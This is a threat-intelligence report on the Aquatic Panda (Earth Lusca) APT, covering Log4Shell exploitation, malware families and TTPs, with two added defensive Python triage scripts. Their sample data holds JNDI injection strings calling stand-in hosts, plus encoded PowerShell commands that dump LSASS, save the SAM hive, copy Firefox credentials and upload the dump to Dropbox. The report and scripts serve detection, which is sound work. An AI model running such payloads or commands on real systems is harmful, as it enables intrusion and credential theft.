Aquatic Panda (Earth Lusca) APT - Log4Shell Exploitation and Multi-Platform Backdoor Campaigns Targeting 17 Countries — Threadlinqs Intelligence
Threat ID: TL-2026-0986 · Severity: CRITICAL · CVSS: 10 · Status: ACTIVE · Category: VULNERABILITY
Attribution: Earth Lusca · China · ESPIONAGE
China-aligned APT Aquatic Panda (aka Earth Lusca) conducts targeted intelligence collection and industrial espionage across telecommunications, government, NGOs, and academic institutions using
Aquatic Panda is a China-aligned advanced persistent threat (APT) group active since at least May 2020 that focuses on intelligence collection and industrial espionage against critical infrastructure sectors. It is tracked under many aliases (Earth Lusca, TAG-22, FishMonger, BRONZE UNIVERSITY, Charcoal Typhoon, CHROMIUM, Red Dev 10, Red Scylla, RedHotel), is associated with the Winnti Group umbrella, and maintains extensive command-and-control infrastructure (50+ servers hosted in China) serving implants for more than one operating system.
The group's primary exploitation vector is CVE-2021-44228 (Log4Shell), a CVSS 10.0 remote code execution vulnerability in Apache Log4j 2 (versions 2.0-beta9 through 2.14.1). When a vulnerable version logs a string containing a JNDI lookup such as ${jndi:ldap://attacker-host/x}, the logger resolves the lookup over LDAP, RMI or DNS and can fetch attacker-supplied Java code or deserialize attacker-controlled objects, so any Java application that logs attacker-influenced input (HTTP headers, usernames, request parameters) is exposed. Since public disclosure in December 2021 the flaw has been exploited by many threat actors, Aquatic Panda among them, to gain arbitrary code execution on government networks, telecommunications infrastructure, and other critical sectors.
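The trigger is a string of the form ${jndi:<scheme>://<host>/...} reaching a vulnerable Log4j 2 logger, and scanners routinely hide it behind URL encoding and nested Log4j lookups such as ${lower:j} and ${::-j}, which a naive grep for "${jndi:" misses. The following is an added example, not code from this page or from any vendor's rule set: a triage script that peels those layers off before matching, run over constructed Apache-style access-log lines (the hosts are RFC 5737 documentation addresses and the payloads are typical scanner shapes, not indicators from any report).

```python
import re
import urllib.parse
from typing import Dict, List

# Constructed sample lines in Apache combined-log format (not real telemetry).
# Hosts are RFC 5737 documentation addresses; the payloads mirror the shapes
# mass scanners used after December 2021, not indicators from any report.
SAMPLE_LOGS = [
    '198.51.100.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '198.51.100.7 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=${${lower:j}ndi:${lower:l}${lower:d}ap://203.0.113.11/x} HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '198.51.100.8 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "%24%7Bjndi%3Armi%3A%2F%2F203.0.113.12%3A1099%2Fobj%7D"',
    '198.51.100.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.13/cb}"',
]

# ${lower:x} / ${upper:x}: Log4j case-conversion lookups used to split the keyword.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.IGNORECASE)
# ${prefix:key:-default}: a lookup that fails and yields its default, e.g. ${::-j} -> j.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# The trigger itself, once normalized: ${jndi:<scheme>://<host[:port]>/...
_JNDI = re.compile(r"\$\{jndi:(?P<scheme>[a-z0-9+.-]+):/*(?P<target>[^/}\s]*)", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 8) -> str:
    """Peel URL encoding and nested Log4j lookups until the string stops changing."""
    for _ in range(max_rounds):
        before = text
        text = urllib.parse.unquote(text)
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def find_jndi(line: str) -> List[Dict[str, str]]:
    """Return every JNDI trigger in a log line, with the scheme and callback target."""
    return [
        {"scheme": m.group("scheme").lower(), "target": m.group("target")}
        for m in _JNDI.finditer(normalize(line))
    ]


def scan_logs(lines: List[str]) -> List[Dict[str, object]]:
    """Run find_jndi over a log and tag each hit with its 1-based line number."""
    findings = []
    for number, line in enumerate(lines, start=1):
        for hit in find_jndi(line):
            findings.append({"line": number, **hit})
    return findings


if __name__ == "__main__":
    for f in scan_logs(SAMPLE_LOGS):
        print(f"line {f['line']}: {f['scheme']} callback to {f['target']}")
```

A hit on the normalized string says the host was probed, not that it was exploited; confirm by checking whether the Java process made an outbound LDAP, RMI or DNS connection to the extracted target and then spawned a child process. On the patching side, upgrade Log4j 2 to 2.17.1 or later; setting log4j2.formatMsgNoLookups=true alone was shown to be an incomplete mitigation by CVE-2021-45046.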
Aquatic Panda's malware arsenal includes SprySOCKS (a Linux backdoor derived from the Windows Trochilus RAT, paired with the RawWNPF kernel driver), ShadowPad (modular backdoor platform), BIOPASS RAT (Python-based RAT that streams the victim's screen through a bundled OBS Studio), KTLVdoor (obfuscated multi-platform Go backdoor), SodaMaster, Spyder, and RPipeCommander. The RawWNPF kernel driver hooks NtQuerySystemInformation (the classic process-hiding hook), registers a filesystem minifilter, and installs Windows Filtering Platform (WFP) callouts that conceal the implant's network connections and divert selected TCP traffic to it for stealthy command delivery.
Operation FishMedley (January to October 2022) compromised seven targets (government bodies, NGOs, think tanks, and a Catholic charity) in Taiwan, Hungary, Turkey, Thailand, the United States, and France. Broader targeting spans 17 countries (2021 to 2023) across Asia, Europe, and North America, with a focus on telecommunications operators, government agencies, academic institutions, and policy analysis organizations.
Observed attack chains begin from already-held privileged access (domain administrator credentials) rather than a fresh exploit, then proceed to lateral movement with Impacket tooling and WMI, credential harvesting (LSASS memory dumping, Firefox credential database extraction, registry hive collection), network reconnaissance with fscan and nbtscan, and exfiltration of the collected data to Dropbox through its API. Supporting tradecraft includes PowerShell scripting, Base64-encoded commands, EDR evasion, and living-off-the-land binaries.
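Several of the TTPs above (PowerShell, Base64 encoding, LSASS dumping, Firefox credential theft, registry hive collection, Dropbox exfiltration) only become visible in process-creation telemetry once the -EncodedCommand payload is decoded, and a common mistake is decoding it as UTF-8: PowerShell expects Base64 over UTF-16LE, and it accepts abbreviated flags such as -e, -ec and -enc. This added example (not from the page and not the vendor's detection rules) decodes the flag in all its abbreviated forms and checks the decoded script against a small indicator list. The events, hostnames and paths are constructed for the example, and encode_ps exists only to build them.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc, ...),
# so build the alternation from the prefixes instead of hard-coding "-enc".
_ENC_FORMS = ["encodedcommand"[:n] for n in range(14, 0, -1)] + ["ec"]
_ENC_FLAG = re.compile(
    r"(?:^|\s)-(?:" + "|".join(_ENC_FORMS) + r")\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)

# Indicator patterns applied to the command line plus its decoded payload.
INDICATORS = {
    "lsass_dump": re.compile(r"lsass|minidump|sekurlsa|procdump", re.IGNORECASE),
    "hive_dump": re.compile(r"\breg(?:\.exe)?\s+save\b", re.IGNORECASE),
    "firefox_creds": re.compile(r"logins\.json|key4\.db|cert9\.db", re.IGNORECASE),
    "dropbox_exfil": re.compile(r"dropboxapi\.com|dropbox\.com", re.IGNORECASE),
    "download_cradle": re.compile(r"downloadstring|invoke-expression|\biex\b|invoke-webrequest", re.IGNORECASE),
}


def encode_ps(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it: Base64 over UTF-16LE.
    Used here only to construct the sample events below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Extract and decode the -EncodedCommand payload, or return None if there is none."""
    match = _ENC_FLAG.search(cmdline)
    if not match:
        return None
    blob = match.group(1)
    blob += "=" * (-len(blob) % 4)  # tolerate stripped padding
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        # Not what PowerShell itself produces, but hand-rolled UTF-8 blobs do turn up.
        return raw.decode("utf-8", errors="replace")


def triage_event(event: Dict[str, str]) -> Dict[str, object]:
    """Decode the payload if present and flag indicators across the visible and decoded text."""
    decoded = decode_encoded_command(event["cmdline"])
    haystack = event["cmdline"] + ("\n" + decoded if decoded else "")
    flags = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    return {"host": event["host"], "encoded": decoded is not None, "decoded": decoded, "flags": flags}


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    return [triage_event(e) for e in events]


# Constructed process-creation records (Sysmon Event ID 1 / Security 4688 shape); hostnames
# and paths are made up, and the payloads are the kind of commands the TTPs above describe.
SAMPLE_EVENTS = [
    {"host": "WS-014", "parent": "explorer.exe",
     "cmdline": 'powershell.exe -NoProfile -Command "Get-Service"'},
    {"host": "WS-014", "parent": "cmd.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_ps(
         r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Windows\Temp\l.dmp full")},
    {"host": "SRV-DC01", "parent": "wmiprvse.exe",
     "cmdline": "powershell.exe -ec " + encode_ps(
         "Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post "
         "-Headers @{Authorization='Bearer REDACTED'} -InFile C:\\Windows\\Temp\\l.dmp")},
    {"host": "WS-022", "parent": "wmiprvse.exe",
     "cmdline": "powershell.exe -e " + encode_ps(
         r'reg save HKLM\SAM C:\Temp\sam.hiv; Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\*\logins.json" C:\Temp')},
]


if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        print(result["host"], "encoded" if result["encoded"] else "plain", result["flags"])
```

The parent process is kept on each record because a powershell.exe child of wmiprvse.exe is itself the WMI lateral-movement signal the text describes; pairing that with a decoded LSASS or Dropbox payload is what turns a noisy rule into a usable one.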
A U.S. Department of Justice indictment unsealed on March 5, 2025 charged I-SOON (Anxun) CEO Wu Haibo, COO Chen Cheng, and technical staff with conducting cyber-espionage operations from 2016 to 2023 funded by the Chinese government. The FBI added the indicted individuals to its Most Wanted Cyber list; state-sponsored attribution is assessed with HIGH confidence.
Weaknesses (CWE)
CWE-917 (Expression Language Injection), CWE-20 (Improper Input Validation), CWE-400 (Uncontrolled Resource Consumption), CWE-502 (Deserialization of Untrusted Data), CWE-269 (Improper Privilege Management), CWE-78 (OS Command Injection), CWE-94 (Improper Control of Generation of Code)
Target sectors: telecommunications, government administration, critical infrastructure, finance, technology, energy, health, academia, think tanks, NGOs, cryptocurrency trading, defense contractors
Target regions: Taiwan, Hong Kong, Thailand, Pakistan, Vietnam, Philippines, Indonesia, Malaysia, Singapore, Hungary, Turkey, France
Detections & IOCs
This threat has 9 detection rules (Splunk SPL, Microsoft KQL and Sigma) and 26 indicators of compromise. Detection query text and full IOC values are available to authenticated users and programmatically via the Threadlinqs MCP server (Purple tier).
Tags: VULNERABILITY, CRITICAL, threat intelligence, cybersecurity, CVE-2021-44228
MITRE ATT&CK: T1190 (Exploit Public-Facing Application), T1566 (Phishing), T1598 (Phishing for Information), T1059 (Command and Scripting Interpreter), T1210 (Exploitation of Remote Services), T1204 (User Execution), T1547 (Boot or Logon Autostart Execution), T1543 (Create or Modify System Process), T1505 (Server Software Component)